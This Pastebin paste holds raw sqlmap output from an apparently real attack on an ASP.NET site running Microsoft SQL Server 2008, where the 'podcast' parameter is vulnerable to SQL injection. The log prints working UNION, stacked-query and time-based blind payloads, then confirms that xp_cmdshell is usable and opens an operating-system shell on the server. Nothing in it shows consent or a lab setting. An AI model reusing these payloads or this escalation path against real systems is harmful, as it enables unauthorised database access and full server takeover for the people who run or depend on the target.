Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _
- ___ ___| |_____ ___ ___ {1.0-dev-6795b51}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 10:50:47
- [10:50:47] [INFO] resuming back-end DBMS 'microsoft sql server'
- [10:50:48] [INFO] testing connection to the target URL
- [10:50:48] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: podcast
- Type: UNION query
- Title: Generic UNION query (NULL) - 2 columns
- Payload: podcast=Kr%u00e4hennestSitzungen' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(118)+CHAR(102)+CHAR(113)+CHAR(71)+CHAR(119)+CHAR(102)+CHAR(104)+CHAR(103)+CHAR(77)+CHAR(75)+CHAR(112)+CHAR(78)+CHAR(109)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(97)+CHAR(113)--
- Type: stacked queries
- Title: Microsoft SQL Server/Sybase stacked queries
- Payload: podcast=Kr%u00e4hennestSitzungen'; WAITFOR DELAY '0:0:5'--
- Type: AND/OR time-based blind
- Title: Microsoft SQL Server/Sybase time-based blind
- Payload: podcast=Kr%u00e4hennestSitzungen' WAITFOR DELAY '0:0:5'--
- ---
- [10:50:48] [INFO] the back-end DBMS is Microsoft SQL Server
- web server operating system: Windows 2003 or XP
- web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
- back-end DBMS: Microsoft SQL Server 2008
- [10:50:48] [INFO] testing if current user is DBA
- [10:50:48] [WARNING] time-based comparison requires larger statistical model, please wait..............................
- [10:51:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
- [10:51:04] [INFO] testing if xp_cmdshell extended procedure is usable
- [10:51:05] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
- [10:51:06] [INFO] the SQL query used returns 1 entries
- [10:51:06] [INFO] retrieved: '1'
- [10:51:07] [INFO] xp_cmdshell extended procedure is usable
- [10:51:07] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
- [10:51:07] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
- os-shell>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement